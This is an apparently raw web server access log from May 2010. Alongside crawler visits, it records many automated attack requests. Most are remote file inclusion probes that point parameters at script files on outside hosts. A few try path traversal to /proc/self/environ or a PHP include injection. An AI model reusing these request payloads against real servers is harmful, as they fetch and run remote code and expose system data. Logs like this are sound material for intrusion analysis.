222.236.47.182 - - [08/May/2010:07:47:50 -0500] "GET /logs/access_log.1263859200/index1.php?site=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.129.119.43 - - [08/May/2010:07:48:50 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.1" 200 2441 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.42 - - [08/May/2010:07:55:24 -0500] "GET /logs/access_log.1238371200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.95 - - [08/May/2010:07:56:53 -0500] "GET /logs/access_log.1258070400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.89 - - [08/May/2010:07:57:20 -0500] "GET /logs/access_log.1160179200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
111.89.128.186 - - [08/May/2010:07:58:10 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://raml.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
111.89.128.186 - - [08/May/2010:07:58:11 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://raml.interfree.it/id.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
207.46.195.235 - - [08/May/2010:07:58:50 -0500] "GET /logs/access_log.1175904000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
99.39.2.249 - - [08/May/2010:08:00:01 -0500] "GET /logs//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:00:01 -0500] "GET /logs/access_log.1263427200//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:00:01 -0500] "GET //includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:00:17 -0500] "GET //includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:00:17 -0500] "GET /logs//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:00:17 -0500] "GET /logs/access_log.1263427200//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.131.106.30 - - [08/May/2010:08:00:49 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
99.39.2.249 - - [08/May/2010:08:00:50 -0500] "GET /logs/access_log.1263427200//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:00:50 -0500] "GET /logs//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:00:50 -0500] "GET //includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.131.106.30 - - [08/May/2010:08:00:50 -0500] "GET /costume/thmb4.htm HTTP/1.0" 200 3851 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
99.39.2.249 - - [08/May/2010:08:01:03 -0500] "GET /logs//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:01:03 -0500] "GET /logs/access_log.1263427200//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:01:03 -0500] "GET //includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:02:13 -0500] "GET /logs/access_log.1262044800//includes/include_onde.php?include_file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
194.33.181.94 - - [08/May/2010:08:03:20 -0500] "GET /logs/access_log.1265068800 HTTP/1.1" 404 310 "http://yandex.ua/yandsearch?rdrnd=388370&text=Possible%20reason%20for%20block%20is%20that%20you%20are%20surfing%20from%20UkraineIp%20address%20is%3A%20194.33.181.94%20-%20Time%3A%20Sat%2C%2008%20May%202010%2007%3A02%3A38%20-0600%20-%20My%20browser%20is%3A%20%20Mozilla%2F5.0%20(Windows%3B%20U%3B%20Windows%20NT%205.1%3B%20ru%3B%20rv%3A1.9.1.3)%20Gecko%2F20090824%20Firefox%2F3.5.3&stype=first&clid=46511&lr=141""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
194.33.181.94 - - [08/May/2010:08:03:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
194.33.181.94 - - [08/May/2010:08:03:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
87.250.255.243 - - [08/May/2010:08:03:25 -0500] "GET /logs/access_log.1270080000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [08/May/2010:08:03:44 -0500] "GET /logs/access_log.1262476800//appserv/main.php?appserv_root=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:03:44 -0500] "GET //appserv/main.php?appserv_root=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:03:44 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.195.112.180 - - [08/May/2010:08:04:03 -0500] "GET /logs/access_log.1240358400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.151.149 - - [08/May/2010:08:08:19 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:08:32 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:08:32 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 200 4754 "-""Mozilla/5.0"
207.46.204.178 - - [08/May/2010:08:09:21 -0500] "GET /logs/access_log.1243987200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.44.82.61 - - [08/May/2010:08:09:45 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:08:09:45 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:08:09:45 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 4756 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:08:10:42 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:08:10:42 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:08:10:42 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 4756 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:08:10:56 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:08:10:56 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:08:10:56 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 4756 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:08:13:53 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 4756 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:08:13:53 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:08:13:53 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:08:13:53 -0500] "GET /logs/access_log.1225843200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.12.17 - - [08/May/2010:08:13:56 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:08:14:15 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:08:14:15 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 200 4756 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs/access_log.1265241600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs/access_log.1263859200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs/access_log.1265241600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs/access_log.1263859200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs/access_log.1265241600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:37 -0500] "GET /logs/access_log.1263859200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:50 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:51 -0500] "GET /logs/access_log.1265241600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:51 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:51 -0500] "GET /logs/access_log.1263859200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:51 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:51 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:51 -0500] "GET /logs/access_log.1265241600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:08:14:51 -0500] "GET /logs/access_log.1263859200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
207.46.199.178 - - [08/May/2010:08:16:17 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.47 - - [08/May/2010:08:18:50 -0500] "GET /logs/access_log.1174262400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.80.108.8 - - [08/May/2010:08:23:56 -0500] "GET //skin/zero_vote/error.php?dir=http://raml.interfree.it/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
220.80.108.8 - - [08/May/2010:08:23:56 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://raml.interfree.it/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
217.173.194.130 - - [08/May/2010:08:25:08 -0500] "GET /logs/principal.php?conteudo=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:08:25:08 -0500] "GET /principal.php?conteudo=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:08:25:08 -0500] "GET /logs/access_log.1264723200/principal.php?conteudo=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:08:25:13 -0500] "GET /logs/access_log.1247270400/principal.php?conteudo=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:08:26:17 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.173.194.130 - - [08/May/2010:08:27:37 -0500] "GET /logs/access_log.1262304000/principal.php?conteudo=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:08:27:39 -0500] "GET /logs/access_log.1262304000/principal.php?conteudo=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:08:27:39 -0500] "GET /principal.php?conteudo=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:08:27:39 -0500] "GET /logs/principal.php?conteudo=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.48.76.9 - - [08/May/2010:08:30:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
99.39.2.249 - - [08/May/2010:08:30:54 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 200 4754 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:30:54 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:30:54 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.195.112.180 - - [08/May/2010:08:32:51 -0500] "GET /logs/access_log.1214784000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
99.39.2.249 - - [08/May/2010:08:36:32 -0500] "GET /logs/access_log.1268956800%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
70.38.117.233 - - [08/May/2010:08:40:32 -0500] "GET /logs/access_log.1264118400/index.php?menu=deti&page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.117.233 - - [08/May/2010:08:40:32 -0500] "GET /index.php?menu=deti&page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.38.117.233 - - [08/May/2010:08:40:32 -0500] "GET /logs/index.php?menu=deti&page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.38.117.233 - - [08/May/2010:08:40:32 -0500] "GET /logs/access_log.1265587200/index.php?menu=deti&page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.117.233 - - [08/May/2010:08:40:46 -0500] "GET /logs/access_log.1266537600/index.php?menu=deti&page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:42:41 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:42:41 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:42:41 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:42:41 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:42:46 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 200 4754 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:42:51 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:43:35 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 200 4754 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:43:35 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:43:35 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:44:36 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.216.43.133 - - [08/May/2010:08:45:40 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.216.43.133 - - [08/May/2010:08:45:41 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.216.43.133 - - [08/May/2010:08:45:41 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.216.43.133 - - [08/May/2010:08:45:41 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.216.43.133 - - [08/May/2010:08:45:41 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.216.43.133 - - [08/May/2010:08:45:41 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
99.39.2.249 - - [08/May/2010:08:46:36 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:46:39 -0500] "GET /logs/access_log.1268956800%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:08:46:39 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 200 4754 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:08:48:13 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
193.252.118.174 - - [08/May/2010:08:49:12 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
87.250.255.243 - - [08/May/2010:08:49:26 -0500] "GET /logs/access_log.1216166400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
99.39.2.249 - - [08/May/2010:08:49:53 -0500] "GET /logs/access_log.1268956800%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.129.119.14 - - [08/May/2010:08:54:37 -0500] "GET /logs/access_log.1223856000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [08/May/2010:08:55:19 -0500] "GET /logs/access_log.1248739200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
205.234.252.102 - - [08/May/2010:08:57:34 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.234.252.102 - - [08/May/2010:08:57:34 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
205.234.252.102 - - [08/May/2010:08:57:34 -0500] "GET /src/admin/pt_upload.php?config_file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
